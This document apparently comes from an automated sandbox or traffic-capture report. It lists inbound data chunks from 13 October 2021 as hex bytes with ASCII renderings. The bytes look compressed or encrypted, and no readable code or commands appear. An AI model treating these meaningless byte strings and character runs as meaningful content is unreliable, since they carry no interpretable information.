b2 2a bb bc c2 27 cb d2 7c 08 f7 f8 0d 1e fe 5f ca bc 12 fc 14 a8 4b 95 87 ef 8e 63 c9 7b 37 b8 5f d4 b1 01 2f 82 ff cd 82 af 55 74 ab 71 47 5f 6f 93 41 fe Data Ascii: z34&S\|"Rot]e$u2iQY]A3<b<'Dl7K3Ex,6GNvOWYEY,WWBy\|&!_(XECe(w(lE<eFC"Cz]x8=]nt6`<'\|_Kc{7_/UtqG_oA
2021-10-13 07:59:22 UTC	742	IN	Data Raw: c4 ab 63 14 0b 68 b4 92 31 63 e3 c1 4c ae 47 c3 ff b3 76 0e 24 47 92 cb 2c 9a 91 64 ed fd 44 11 48 35 28 a9 83 21 88 aa f1 ac 05 62 19 1f d0 ab 91 ae 85 76 1f 8b dd 1d ca b0 d9 d8 82 c5 0e b0 59 83 66 8b 38 3c 3f 8a a8 7d 90 f2 23 64 18 9d 90 2e fd 34 41 c9 b3 9c 0a 58 26 e8 0d 79 58 09 b0 d5 7e 74 29 a3 1a 90 54 a1 ed f1 50 45 68 ad a6 cd c9 39 15 08 1c aa da 9d 01 ba 15 50 23 43 64 ab 31 5a 82 14 37 8a bd 15 f8 33 ad 8e d2 f1 a4 46 94 c7 58 97 a0 c8 55 b3 43 48 5b 35 d9 68 ad ce 5c 26 58 a5 45 8a 34 17 4b 30 cf 1c db 14 1b 4c aa 71 54 82 9d 44 fd d6 c4 58 20 ab 14 92 c9 63 ed 01 42 ae 46 b3 f3 23 39 70 fd b5 b9 15 d6 c8 11 3b c9 55 61 3f 11 86 2c 40 e7 fd 54 a8 e5 8d 98 2c d0 fd e6 68 5e c8 79 0f d9 06 23 b2 07 6c 29 11 a4 c4 e0 3a c9 03 c2 55 13 3a 8c Data Ascii: ch1cLGv$G,dDH5(!bvYf8<?}#d.4AX&yX~t)TPEh9P#Cd1Z73FXUCH[5h\&XE4K0LqTDX cBF#9p;Ua?,@T,h^y#l):U:
2021-10-13 07:59:22 UTC	750	IN	Data Raw: ed 4d e6 cf a3 3a 8b 5b 6c 53 e3 18 8f f0 b7 f5 9c 36 d3 26 0e 34 e2 f4 64 8f 3f e9 15 49 b2 51 b8 bf 15 20 29 55 4c 4b d7 2f 3a 00 ce 84 9c aa 63 0c c0 43 c7 7b 27 3e 78 d0 9b 63 4d 71 47 6d 5b 56 7f 69 9e 16 a9 c7 3b 2a b3 26 64 96 ff 92 0d a9 55 3b 33 f0 6e e6 84 04 fb 61 51 55 ad 5a e4 ff 37 bd b1 89 92 e5 41 f8 92 a7 e7 43 d3 2a 72 68 4a 7d 91 7f 51 10 ae 51 ae 86 a9 c2 6a 9f 2f 75 25 0f 39 3e c8 58 3a c4 cf 48 80 39 63 66 d4 fc 42 67 91 1d 3b c6 b5 ec 36 8e cf eb fd 5d fe cb bf 2c bd 3d 93 5d 0b ac f9 28 90 a1 4a 06 0f 00 85 3a 81 21 64 fe 29 55 4d 25 96 44 3b 68 22 c3 bc 06 a6 e5 3f dc ea 75 f0 e5 60 c4 de 35 fb b3 05 6c 34 b5 be a9 30 3c e4 34 b3 d1 86 43 5d 92 bb 94 45 a6 6a ff c8 e8 33 6b f9 ef a2 29 f7 bc f5 7b ee 7a bb 13 98 69 49 15 49 bf b0 Data Ascii: M:[lS6&4d?IQ )ULK/:cC{'>xcMqGm[Vi;&dU;3naQUZ7ACrhJ}QQj/u%9>X:H9cfBg;6],=](J:!d)UM%D;h"?u`5l40<4C]Ej3k){ziII
2021-10-13 07:59:22 UTC	758	IN	Data Raw: 82 22 8d 54 f7 91 9c ae 12 21 79 49 81 19 d2 59 51 e7 61 47 56 c8 5e bd bc 72 74 06 a8 64 57 5e a4 36 d3 90 a2 77 94 4e de 8f 78 ce e2 0e fc f2 41 02 9d fa 10 b3 ad 99 6d b5 2e 91 bf 52 b1 db a2 57 aa d9 b4 06 77 c9 10 99 82 34 fa 94 9b 4c c0 31 a4 52 37 fc a8 da a6 56 17 ea 67 f8 a7 37 21 5f ed 67 94 4a 56 b6 fb df e9 c0 73 4c 8f 5b 81 ae 52 02 6c a6 97 c2 a2 35 43 0e 8f a0 27 c1 47 d2 c7 af ec 03 c1 be 10 4a f2 bd 02 50 08 63 f8 ac 7e fe 47 58 ff 66 d5 5c 06 f8 2f fc 0b 4f 61 0b e9 5a d8 e4 ba 5d 45 bf d3 ae 32 a6 8b dd 3d f1 f3 6a 8c d7 00 a8 43 0a c1 26 09 44 82 6f 2f 1e eb ac be 57 6b bd 4e 35 14 8e 39 e9 ca af 69 96 95 8d 89 e8 ba 50 88 97 ed b5 37 23 8d b1 4b 94 44 af 76 ee 67 fc fe 90 82 bc 86 81 d4 54 3e 10 c3 1e 9b 87 9a 83 09 01 bb bd 34 7d 5e Data Ascii: "T!yIYQaGV^rtdW^6wNxAm.RWw4L1R7Vg7!_gJVsL[Rl5C'GJPc~GXf\/OaZ]E2=jC&Do/WkN59iP7#KDvgT>4}^
2021-10-13 07:59:22 UTC	766	IN	Data Raw: 93 dc 1c 12 e3 00 b0 dd c3 06 1f 81 97 82 3d e6 a1 91 d7 b9 64 5a 9c e5 f6 b2 fe 0e d4 21 3f 75 07 9d cc 19 44 a3 9d be 31 de 7d 94 19 c9 81 51 83 a8 81 a2 9f 1c 80 3d eb f7 10 27 2b 23 78 11 50 4f 71 81 01 75 99 ac 44 b9 f6 f9 02 25 b1 6a 53 27 26 c4 dc 22 81 45 80 54 7c 63 2c fd 9f 8f 16 b9 72 6a fc fd 87 44 eb 53 5c a3 5c a6 fd 85 84 c5 df 8c ca 62 e5 a6 ac 6a 99 6a 39 e6 7e 9d 24 8b 9c 7c 9f eb 09 63 b7 c1 88 eb 9f 9d a3 9e 53 41 14 a3 d0 38 89 b3 9d ce 86 53 e7 e6 bf dc 47 d7 59 82 67 e6 60 0b 36 5a 4e cb 9d fb 9f 49 f9 b6 b8 1c 80 67 e7 ed 22 11 cd 9b 1d 20 99 b6 42 7e 6e 43 fd 53 12 07 27 6b 9a 2b ae 3e 75 38 15 63 cf 84 cd e1 e1 40 31 3b fd 64 55 5c 5e b3 28 be ae 6d 78 e3 10 61 60 e0 06 6c 15 b1 48 73 78 5d 3b ca c3 46 d3 15 5e 4a 21 58 82 7f bc Data Ascii: =dZ!?uD1}Q='+#xPOquD%jS'&"ET\|c,rjDS\\bjj9~$\|cSA8SGYg`6ZNIg" B~nCS'k+>u8c@1;dU\^(mxa`lHsx];F^J!X
2021-10-13 07:59:22 UTC	773	IN	Data Raw: 33 e8 9a 95 c1 99 ba 70 8a d1 ff e6 9d dd e8 2c 06 d4 99 8d 73 76 05 d1 23 84 43 8f 8a fb 3f db 2c 64 4f c2 8f 21 d5 0d 40 ba 0c 99 7a b6 42 c9 03 f3 88 e3 67 d9 99 d4 a2 d3 ed a9 9b 25 65 0d 2a eb d5 94 1a ed f1 7a 67 1e 78 99 32 fb ee 6c 4a ef c5 93 f8 84 12 17 c5 93 d8 a5 7e e5 64 a7 9d 93 2e 19 14 bf a8 eb 53 f6 cb 25 7b e2 f0 d4 3f 36 a5 62 da 93 8d 3c 85 90 01 64 bd 2a e0 b2 91 2b 21 54 b9 1d 6c 46 36 0c c0 8a c4 43 57 70 97 55 54 32 23 59 60 69 97 cf 54 99 24 c9 33 04 80 40 20 11 48 28 b0 5b 16 02 92 e1 06 44 24 20 ac 18 31 24 22 27 a1 b4 63 2e 22 d2 87 38 41 a9 09 25 c9 8d 98 70 c5 6d a3 7a 9d ab e7 52 8b de 97 b5 bd fe 97 be 22 82 a0 cc 21 67 a1 5a 20 25 18 20 5b 16 95 73 1e 1d 58 a0 c9 00 8c cf 99 bc 0f ba de f9 99 32 01 6f 6f 9f 3c ff 8f 3c fc Data Ascii: 3p,sv#C?,dO!@zBg%ezgx2lJ~d.S%{?6b<d+!TlF6CWpUT2#Y`iT$3@ H([D$ 1$"'c."8A%pmzR"!gZ % [sX2oo<<
2021-10-13 07:59:22 UTC	781	IN	Data Raw: d0 bb dd a9 69 7b a7 26 7b 75 2d 61 b6 3c 15 73 84 af c0 2f 6c dd 1e ba 74 d3 83 03 83 c6 e0 fc fc 1b 99 2b 84 f9 97 bc b0 1e 40 b2 a4 03 9b 32 bd f9 40 6e aa 51 c1 03 d6 34 d5 36 70 41 7a c9 0c f4 d1 34 63 43 14 a8 32 89 4b 48 4d 6f 7e 2b db 97 5f 12 e5 3d c1 99 19 c5 3b cf a4 59 33 17 9f cf 9f 7e 78 29 e7 b0 79 97 15 5f 75 0d 51 cf 98 60 91 2a 4d 4b ab 0d 77 22 14 cd 77 c2 5a 19 ea 77 2d 34 4d bd 7e d8 77 75 6c c2 2a 3c cb ff 2a 9d 60 76 29 c7 3a a4 95 60 ac 71 2b 9a 32 20 42 02 38 95 3e c6 9d fd cf d8 b7 81 79 42 dc 73 d4 15 73 24 97 7d d6 8a 7f af b4 29 33 79 a3 6e ae 50 9a 9b c2 27 13 74 f2 06 d2 72 b1 02 59 98 4e 3c 2c ac 60 54 c6 12 01 01 36 ef 34 03 38 06 20 59 63 3d f5 ee 68 34 35 4e 2d 6b 0e 42 77 fa c9 07 b4 5f ec 14 5f 62 eb 3b 33 58 76 86 a6 Data Ascii: i{&{u-a<s/lt+@2@nQ46pAz4cC2KHMo~+_=;Y3~x)y_uQ`MKw"wZw-4M~wul<*`v):`q+2 B8>yBss$})3ynP'trYN<,`T648 Yc=h45N-kBw__b;3Xv
2021-10-13 07:59:22 UTC	789	IN	Data Raw: 19 02 53 07 4f b7 2a 6e 4e 3e 87 f9 c5 04 c6 3b e1 57 62 61 c6 f7 b7 38 7e 25 ef c5 18 70 ad 35 3c 1d 3e d6 16 43 cb 69 f6 4e 0b 0f 23 64 2f 0e cf 5a 93 d4 f9 62 a6 4e cf 70 1c 67 a2 82 33 4f ac 73 da 1f 65 19 f0 f7 28 08 87 54 3c b2 d3 e9 c4 9a 9b c4 3b 1e 6e 0f 3e ef bc ef a2 f7 f5 f3 b3 69 54 41 3d 00 2a 23 ad aa f9 b9 f5 7b 7c ed 51 33 96 9e b2 e0 11 53 47 94 17 06 f9 5c 9e 0e b3 73 06 8f d5 63 f3 a5 9a 8e ce 7c b9 87 9a 18 96 7a 5d 6e ca 70 e2 1c 37 2b e2 4d b8 a1 0f 2c 22 1c 98 12 90 44 55 f6 2a e3 0b 1c 9a 22 d9 a5 47 df 96 52 c3 43 a9 84 46 09 41 d2 2b c5 9a 40 e2 69 6b 38 3e 8a 06 2d 53 c9 28 09 bc 74 6d 4c 1b 79 8e f1 16 93 77 67 5b 04 b4 d6 1f d2 09 e1 69 4d d9 59 e1 53 d0 40 62 1e 41 4b 31 c1 5f ff 22 70 22 4b a3 4f c7 d9 2c a9 91 0f 37 67 79 Data Ascii: SOnN>;Wba8~%p5<>CiN#d/ZbNpg3Ose(T<;n>iTA=#{\|Q3SG\sc\|z]np7+M,"DU*"GRCFA+@ik8>-S(tmLywg[iMYS@bAK1_"p"KO,7gy
2021-10-13 07:59:22 UTC	797	IN	Data Raw: b4 0e 56 a6 c6 d5 e5 b3 ce 2b cb 87 9c 97 8e 4c f9 ec c4 82 ff cf 94 f7 1c 37 97 2f 39 af 2e 9e 5d bc 54 af a7 b5 c6 c3 03 5b d9 13 04 a0 cb a7 88 c7 91 af 23 9e 47 bc 91 79 8e 79 8f 79 26 f3 22 f3 26 f3 2a f2 59 e6 69 e4 df 4f ae 70 d8 9d 79 dd bc cf 3c d0 3c ef 60 80 91 b7 ab 1d f3 4a 44 97 b3 84 2c 8c 78 ff 20 e8 2e 09 3a e3 70 c0 c7 90 6e 24 cc 6d 4d d7 4d 91 67 da ed cd 28 8d 57 c6 a0 e7 43 78 1c 0f a8 4d 7d f0 12 c8 c7 99 7c 49 8c 31 b0 37 11 a6 3d 03 71 1c 63 64 6e 23 cc 6c cd c4 89 8d a1 b8 c9 98 af 37 19 53 1e f9 b8 96 31 68 6e 33 46 3e 13 71 36 62 d6 f8 ef 73 86 38 66 e5 b6 32 24 55 e4 aa b1 3d d8 f3 68 94 bf e4 0c 52 c8 58 8c 92 c1 96 46 1a 9e d2 35 84 2d 55 c2 7d 64 90 fb fe 27 b2 52 77 07 4d 0d 90 34 0b aa e5 90 e3 1c 8b dd 2b 63 ea ae 91 75 Data Ascii: V+L7/9.]T[#Gyyy&"&*YiOpy<<`JD,x .:pn$mMMg(WCxM}\|I17=qcdn#l7S1hn3F>q6bs8f2$U=hRXF5-U}d'RwM4+cu
2021-10-13 07:59:22 UTC	805	IN	Data Raw: da 93 09 f9 82 cb 4b 51 c6 a9 cc c6 60 ce ab a0 c3 4e be 9d 6d 26 6d d7 cb 07 96 57 32 8a cf 96 95 77 6c 77 15 e3 2c 67 62 26 e6 d1 96 96 35 46 7b e7 5e b9 5e 7a 87 cb 4b 3b 23 32 ef 75 e7 10 44 0f 3b 3a ae a7 72 07 0c 52 6f f9 65 40 27 17 95 c8 34 c4 e5 2c 5a 7b d9 5c cb 1f 18 66 dc cc ac c6 ae 1f 1f df e5 55 81 6b ad 3e 5a 51 6f 9b a7 88 75 56 a0 b8 c7 c4 d1 1e a8 ce f6 0b 63 57 df 12 60 01 a2 a8 b8 65 a4 98 8e d1 62 a2 6e 1d 75 99 59 5d 67 58 59 67 42 1c cb b0 b1 ad 85 9a 2c b4 84 4e f0 2f aa 7e 6e ac 0f 4c 64 42 9f 8c f2 b9 3f 56 4c a5 8d f6 ce 08 1f ed 93 5e b9 d2 f7 73 8a 32 5a 73 9d 46 90 67 fb 1a 44 1a df aa d4 f2 5d 7b c1 20 98 59 58 60 e0 ff 29 f2 d0 e7 6c 40 b3 e5 9a 75 1c 39 65 a1 b3 a6 28 f9 f1 e6 4c 8d 32 c7 cb 43 d9 d3 b7 93 9e 63 d9 d6 12 Data Ascii: KQ`Nm&mW2wlw,gb&5F{^^zK;#2uD;:rRoe@'4,Z{\fUk>ZQouVcW`ebnuY]gXYgB,N/~nLdB?VL^s2ZsFgD]{ YX`)l@u9e(L2Cc
2021-10-13 07:59:22 UTC	813	IN	Data Raw: 38 b9 a4 24 69 ec 62 d0 ad 01 da 56 46 2a 55 04 ea e7 2e fb 86 62 2c 1d 69 35 84 3d cf df 56 9b 23 75 d0 28 28 f9 87 77 51 7f 90 c9 fb f1 eb 11 94 3f 02 1c 9a 16 74 ed 14 58 1d d8 ed 41 db 76 a1 f6 c7 9d 93 f5 a2 94 78 59 a8 a3 85 7e 11 35 65 3c b1 22 6c e4 47 8a c9 8f 8b f2 15 c3 71 55 ec ea 33 04 5c 0b ff 85 d0 b3 26 fd 67 cf e7 f4 9d 97 17 33 2b 2d d0 87 94 65 bf 78 42 67 eb 36 fb 95 c0 93 f0 36 0f 13 b4 f5 08 49 08 e5 cd b2 5c eb 7f fa 9f 20 f0 e5 3b e5 80 b4 b1 9b af 68 82 65 a3 d1 3d 42 41 fa 8c f6 24 ee 35 0e bc e2 fd 6a eb ca 24 cf 28 cf 5d d4 5b 13 36 c9 6f 12 a1 e2 a4 bb f4 80 04 dc 3c f5 37 9e fc 78 1c 5d 71 1c 5d 55 f1 c9 d7 2a 23 75 d8 b1 5a 3f e3 a0 4a c0 18 59 01 4c 5c ee 60 54 65 86 e3 f3 4f 40 f5 d5 39 bf fb 3c 42 2d 8d e3 62 46 72 e8 17 Data Ascii: 8$ibVFU.b,i5=V#u((wQ?tXAvxY~5e<"lGqU3\&g3+-exBg66I\ ;he=BA$5j$(][6o<7x]q]U#uZ?JYL\`TeO@9<B-bFr
2021-10-13 07:59:22 UTC	820	IN	Data Raw: fd 87 88 75 ed 2f 26 9e da 67 c7 71 3e 79 f9 0b 67 62 ac 03 41 88 74 72 78 e4 1b a8 42 48 13 b1 68 f4 d2 11 ca 91 b9 3a 5a 48 37 3e 47 eb 24 81 7c 2b 06 ed 3d 4b 49 85 6c a0 5b de db c6 53 3e 05 cd c7 ec 70 d8 f7 cd 91 38 10 9c 0a ee e1 8b 25 71 20 67 22 80 8f 01 d2 e6 98 ae 98 ae fd 3f e1 02 7e 84 10 91 f8 d7 ff b3 00 20 9c 04 6f a6 86 26 5c 93 88 a1 25 94 d1 68 b9 fe 72 ea bf 75 1c ff d6 4f dc 93 fe cc d1 c0 ec 11 80 81 9a d2 3c a1 d8 10 79 3c 7c ac 0e 76 ec 74 3f a2 fd d9 76 d9 12 fd ec 64 f5 92 7c 49 26 81 4d f3 1f e0 7f 9c 39 75 b7 f1 c0 5f 5f e4 86 1f 66 5f b6 52 7d 99 36 b2 77 52 7a 2f 29 0a c1 06 b2 4e c6 4f 43 e5 a1 69 ff 50 0f ff fb 63 27 60 b9 e5 49 7d b2 42 e2 97 db 99 3a 15 cf df 27 d0 93 f1 c9 eb bc c4 28 f1 13 40 39 45 8c ce d5 0a 35 40 df Data Ascii: u/&gq>ygbAtrxBHh:ZH7>G$\|+=KIl[S>p8%q g"?~ o&\%hruO<y<\|vt?vd\|I&M9u__f_R}6wRz/)NOCiPc'`I}B:'(@9E5@
2021-10-13 07:59:22 UTC	828	IN	Data Raw: 9d 52 22 dc 68 7f 40 f9 94 50 e5 d0 4a 5a 5f 94 5b dc 3d 87 88 29 cd 59 78 2b 7a 80 29 b8 e6 c9 58 3b cd 87 64 a1 ec 8c 81 1b 85 d6 81 06 62 cf 8f 90 d2 e2 87 c7 d6 d3 4e a8 77 99 da 6e e2 f2 1c 58 70 4b 75 10 03 d7 65 45 b7 d0 1d 27 2e 24 8f e8 d1 90 fa 3f 78 6e ed ff 6c 5d 22 61 f2 86 de 81 c3 ea b2 e5 b4 0b b7 d9 08 74 37 c3 98 7d fd 9b 07 31 7e 4a 0a 3d e8 e1 cb 3d fc 9b 5b 6e 03 af af 17 df e3 45 da fd 6a 2d aa da 2b d7 36 e0 45 d5 30 cc 89 b6 b3 ea ac 62 74 20 c2 9b de 2f b7 ce 71 22 fc 13 22 49 0c 9c 4e 4d 96 18 18 32 b7 6e 58 c5 76 e5 2d e2 4e 22 99 63 98 4b c1 3b 1b b5 53 d9 82 fe 2f 28 da df 8d 0b 78 13 3f 57 f2 6d 17 3a d8 be f2 16 d2 4e d1 ce d8 dc ce e6 eb 30 50 fc cb 11 47 36 97 22 59 76 b3 31 16 f7 51 64 ae 7c ca 1f 3f 1e 07 84 36 30 e8 b5 Data Ascii: R"h@PJZ_[=)Yx+z)X;dbNwnXpKueE'.$?xnl]"at7}1~J==[nEj-+6E0bt /q""INM2nXv-N"cK;S/(x?Wm:N0PG6"Yv1Qd\|?60
2021-10-13 07:59:22 UTC	836	IN	Data Raw: 36 99 d2 28 f7 5d 0b 22 1b 58 12 dc c6 7a 1f bf 70 cd df 86 3d a5 71 9e 8f 6f 27 c9 3a c2 13 45 87 ba e6 c9 3f e5 ca 40 2a 3f c9 64 54 4a 72 a4 8e 4e 02 81 8b 01 17 5a 90 42 0f 26 fa 1c ea db 72 d3 73 b7 59 72 f6 12 17 fc 3b 2e 6e bb 5e 2a 63 ab 15 63 79 22 17 a4 62 1a ab 66 7c 8e 4d 7b a3 f4 a6 86 3d 2f 68 39 21 53 e8 40 41 5a d0 da 73 43 65 05 10 15 e0 82 91 a7 e7 46 65 35 84 a1 7a ae ae 18 d9 61 a9 22 1d 24 a6 bd af 67 ef 19 9d 57 95 1e d8 ff da 7d 21 e2 d3 55 15 a6 1c aa d4 5e 89 36 69 a9 22 ed 1c 25 7f 4b 72 68 5c cd a3 4c a9 93 d4 cc d3 af 49 fc 45 1f 44 2d b8 43 82 5e b0 ac a3 f7 2c 34 a5 45 4f 9a 15 34 d4 bc 39 3a 18 fa b4 fd a7 66 03 d8 09 4d 59 61 23 11 06 be 56 a3 4f b8 89 f4 2b d8 a8 23 62 a7 3c 1a 26 6e 94 6d 34 89 fe a1 df c7 fe 06 ba 9c e4 Data Ascii: 6(]"Xzp=qo':E?@?dTJrNZB&rsYr;.n^ccy"bf\|M{=/h9!S@AZsCeFe5za"$gW}!U^6i"%Krh\LIED-C^,4EO49:fMYa#VO+#b<&nm4
2021-10-13 07:59:22 UTC	844	IN	Data Raw: c5 92 fd cd 59 de 53 92 d3 dc f0 da 90 9d 9f fb d2 8f d0 f9 ec c7 47 a6 43 9c fc c2 45 86 a0 3a 42 f0 5d b7 2e 76 ef 82 ee d4 60 46 49 0f 9d d5 8f 14 3f 19 12 75 2d 77 df 60 c6 60 92 09 80 7e 30 95 cd 63 0d 7e d0 fa a1 ad ce ab 52 62 72 8e 66 c2 6d af dc 45 32 b6 9d ba 45 80 55 ea 9b 77 cc 39 cd 4d 09 2f 73 0f 80 3d 7f 10 d2 4a a7 a8 0e fd 04 7e 84 38 6f 91 dd 8c d2 d5 30 9f bb 5c 59 ba 39 a3 43 17 ea 91 f9 51 f4 c5 e4 c4 21 52 e9 d5 a5 e2 c7 28 57 a2 be 40 a3 b6 ad 24 f8 14 da 6f 0d 81 f9 aa 2c 90 1a 8f aa 35 5d 38 68 c6 e7 ab 15 4f 72 49 5a af 55 95 4a a2 35 4c ea 8a b2 e4 fb 82 d8 f8 92 c0 63 a3 54 22 2c ca e2 fd d7 86 b1 46 7d 38 c9 55 03 63 b7 9b 79 65 d3 9f 44 1d d3 9b 69 9d 10 65 2f 28 63 43 46 d0 30 61 9f cd 25 40 9c 0b e7 e9 c4 ff 11 cd 28 19 ae Data Ascii: YSGCE:B].v`FI?u-w``~0c~RbrfmE2EUw9M/s=J~8o0\Y9CQ!R(W@$o,5]8hOrIZUJ5LcT",F}8UcyeDie/(cCF0a%@(
2021-10-13 07:59:22 UTC	852	IN	Data Raw: 8b 46 c8 2a b3 62 62 59 df 9f 20 45 ad 27 0b c6 1c 33 61 01 82 06 83 04 77 25 17 ab 58 2a 14 8e e9 21 02 af e3 5d cd 9f e4 bc a0 30 46 dc cf 00 c2 37 5f 3f 1b 6d 07 01 64 ef 98 26 f8 85 a5 e2 39 36 a1 2f 97 46 1c 15 0e 46 4b 91 03 8f 92 e3 88 e1 c2 66 28 43 66 7c 2d 93 76 a8 34 36 1a 76 f1 b0 f4 71 a2 b7 73 09 3f 4f 98 9b d6 d7 80 7d 0c 4a 25 d8 7f f1 f5 c6 2c 08 d4 9a 3c b6 5b ef 91 94 96 e0 fa 23 65 2e ec 36 7f 24 5f 54 5a f6 97 ec 9a 52 b4 5c c5 e6 26 c1 82 13 d0 62 59 86 af cc 6c ca c1 dc b6 8f 9a 25 b0 f0 db 5f ab 19 9f 65 f2 9e fc b9 15 94 c1 c6 5c 9b dc 6a ff 4b e5 fd 97 67 17 2c 5b 58 51 e8 a3 a2 b4 7f e7 be 8a 65 67 34 4a 6c 29 86 20 d2 79 97 bf 45 39 2b bf eb 8d a1 bf 2e d9 ee 5b 0c 25 52 7d 0b bd b7 f8 de 33 38 7f ea fc 6c f9 3e 95 d9 75 96 c2 Data Ascii: FbbY E'3aw%X!]0F7_?md&96/FFKf(Cf\|-v46vqs?O}J%,<[#e.6$_TZR\&bYl%_e\jKg,[XQeg4Jl) yE9+.[%R}38l>u
2021-10-13 07:59:22 UTC	859	IN	Data Raw: aa 9c eb 14 c1 8c 7f f2 29 54 62 0b 5d a1 f3 79 a7 c2 40 f7 40 9e a1 8d 43 8e 9b b8 f1 b3 09 f5 f1 ba f5 d2 be fa 32 ba bb 11 65 2b ac 33 78 ae c1 bc 46 13 a2 19 4b c7 05 9f 77 e0 68 4d 77 d4 d5 1f a6 1d b4 79 8e 5e f6 a5 68 1b 68 0a 75 5c 59 a7 0c c1 68 9d 68 50 3f f8 e4 41 43 ee 81 c9 f7 a8 11 dc 0c d9 e4 89 05 4e c3 6f cf 39 3c ef eb ff c4 06 31 57 79 81 e7 04 e7 e1 83 3b 64 06 25 0d 3e 46 8c 98 91 94 e5 5b 5c 15 6c fd 08 48 50 dc 08 b7 fe 47 82 4b 38 06 15 c7 f4 f6 9c 24 69 57 a8 e0 a2 c8 b0 4c 43 aa b5 3c 5f df 6a 4a de d7 b6 f7 be 4b 93 2d f9 b1 ba e8 04 0b 5f d5 9e 6c 3e 9a 38 c2 77 f1 30 51 8a 14 99 0f b7 50 3a c3 de af ed 17 be 12 a3 42 42 2a 47 f1 12 3e 18 4d 54 df 4b 12 cc 1b 3f 16 78 63 62 91 e4 99 a7 59 cd c5 ac 52 c2 c1 0c 7e bf 20 6e db 6e Data Ascii: )Tb]y@@C2e+3xFKwhMwy^hhu\YhhP?ACNo9<1Wy;d%>F[\lHPGK8$iWLC<_jJK-_l>8w0QP:BB*G>MTK?xcbYR~ nn
2021-10-13 07:59:22 UTC	867	IN	Data Raw: e4 7b ab e5 3a 0c 68 16 83 f7 03 12 5e 2f 4c d5 96 74 17 52 cf 37 bf 3e 4b 55 29 69 6e 92 1f 62 bf 61 6a 29 71 5a e9 75 2c fd 22 c5 b5 4b cd da da a4 ce 51 18 dd 0a 6d ae 73 60 2a a4 fb 22 f1 dc a3 b3 3c 87 58 83 72 8e 72 88 59 d4 3a 5d 6b 1e af ca fd 3d af 82 47 58 08 e2 9d 01 7b fd 50 53 76 c6 b1 eb 23 1b 4f ef 1c a3 21 0f 68 59 d0 8f 16 2d d6 9d 8c ed 3f 36 f6 da 9a 2c 5d 3c ac ec 69 96 7e 17 31 7b b1 ca 3a bd 51 ad 93 c0 76 15 b5 85 57 28 c1 bd fd 74 6c de a8 43 5b 65 83 13 57 c5 3c e8 c1 6f 8a ad 6d d7 b8 22 84 3d 96 82 fa d7 63 2b 3a 33 4a 4d 7d f4 16 72 95 31 9d 79 0b 38 14 3d 63 c2 c9 6e 08 4b 02 5a 23 e0 73 54 03 2d 9f e6 05 6f e3 ca 34 1d 48 4e 56 c9 96 74 7f 65 72 b2 24 c0 8f f2 75 2a 89 de 0a 57 b0 0e c5 cd 3f 71 4c bc e5 b3 68 05 9d 76 d5 08 Data Ascii: {:h^/LtR7>KU)inbaj)qZu,"KQms`"<XrrY:]k=GX{PSv#O!hY-?6,]<i~1{:QvW(tlC[eW<om"=c+:3JM}r1y8=cnKZ#sT-o4HNVter$uW?qLhv
2021-10-13 07:59:22 UTC	875	IN	Data Raw: 9c 73 c7 12 c7 d8 7b c1 ae bc d8 22 96 2c a0 ec 65 ee 3f 04 0e e6 eb bd d2 b4 f0 0b fb d1 46 3f f1 03 df b4 85 e2 20 c2 2e bf f9 fb 28 5f f7 ba 91 d6 7d b9 1f ec 5f 73 64 6f ca e5 9f ed df 21 7c dc 73 dc 92 47 2f 19 48 87 c9 36 6e dd c6 4b 25 34 3f d3 73 79 22 1a ef 9b 96 92 ea ba e5 e0 a2 66 37 3f d9 72 55 12 ba 7d 61 76 24 49 4e ca bd e0 ab b9 2c e4 14 a6 80 b4 24 27 2b 4b bd b3 5e 8a 0a f5 43 0f a4 b8 54 4d f0 ef 79 50 f1 68 7b 8e c8 50 5b 66 fe f2 23 72 fa 97 7b 7d c3 f4 68 23 f5 43 e1 bc 7a 99 0e 2d 86 c1 a4 4a 84 58 4a c5 b5 f4 a5 c1 23 1c 4c a5 57 79 46 5e d5 a3 06 a7 b4 97 57 09 f9 7b 02 54 81 71 61 48 59 e1 80 bd 38 34 c3 46 18 91 a0 58 29 48 d5 69 c3 27 a6 79 55 b2 83 1c df e9 e5 c0 5e 47 2b c8 69 14 50 c6 e1 5f e4 bd af 7d 22 7d 81 1b c2 3b a3 Data Ascii: s{",e?F? .(_}_sdo!\|sG/H6nK%4?sy"f7?rU}av$IN,$'+K^CTMyPh{P[f#r{}h#Cz-JXJ#LWyF^W{TqaHY84FX)Hi'yU^G+iP_}"};
2021-10-13 07:59:22 UTC	883	IN	Data Raw: 9e e3 83 ee 54 b0 ec 6c 69 2a 47 8c 24 df e9 38 6d 7b d3 0e 9e fd 03 0d 5a 1c 43 3b 34 8c f9 ce 19 f8 02 5b 85 fc 8f bf 17 30 b7 46 ba 94 35 a8 12 aa b9 41 85 ea a5 c9 a7 0a d5 f9 62 98 5c fb bd b7 92 80 44 13 13 54 9d cd 83 fd 67 24 47 a1 1a d9 71 8b 2f 2a bb 77 b7 21 ae ae 96 eb ea 85 38 40 d4 af 76 62 f3 55 39 58 cd 8f 3f 91 61 46 aa a2 02 07 6d cd e6 9c 79 e6 5a 33 f8 61 0d 63 3f 63 9a 05 9d f4 e0 14 31 26 19 ff 0b e6 4c 24 51 dd 29 aa 8f 5c 6e 77 09 3f e4 1b 7c 69 79 38 f1 65 dc 91 65 f8 0f 12 a5 f7 dc dd 7d 23 59 17 d7 8e a7 26 0f 38 81 7e 49 17 f4 a2 a2 04 f1 85 16 9f ce 94 b3 e2 ef 52 7c bc a1 77 c7 f5 1c e5 d4 07 dc c5 34 ad ce 17 dd 30 a1 3d 60 c7 60 81 ad cd 95 cb 52 82 f8 cb 4e 57 02 6d ad 7c 0b 51 97 60 15 b1 8f cf 8b d8 6c d1 be 22 8d e8 28 Data Ascii: TliG$8m{ZC;4[0F5Ab\DTg$Gq/w!8@vbU9X?aFmyZ3ac?c1&L$Q)\nw?\|iy8ee}#Y&8~IR\|w40=``RNWm\|Q`l"(
